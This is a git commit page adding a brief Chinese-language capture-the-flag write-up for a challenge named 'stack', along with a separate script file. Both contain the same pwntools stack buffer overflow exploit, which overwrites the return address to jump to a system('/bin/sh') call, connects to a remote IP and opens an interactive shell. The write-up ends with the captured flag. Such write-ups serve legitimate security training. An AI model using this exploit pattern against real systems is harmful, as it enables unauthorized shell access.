Tue, 12 Feb 2019 19:30:56 GMT

master
大蒟蒻 7 years ago
parent 6d92330d8b
commit b75b6bd464

@ -0,0 +1,13 @@
### stack
用ida一看找到字符串和ebp差`0x3a`,然后发现在`0x080491E2`有`system("/bin/sh")`。没了。
```python
from pwn import *
pld = 'A' * (0x3a + 4) + p32(0x080491E2)
p = remote("159.65.68.241", 10003)
p.sendline(pld)
p.interactive()
```
> `flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}`

@ -0,0 +1,5 @@
from pwn import *
pld = 'A' * (0x3a + 4) + p32(0x080491E2)
p = remote("159.65.68.241", 10003)
p.sendline(pld)
p.interactive()
Loading…
Cancel
Save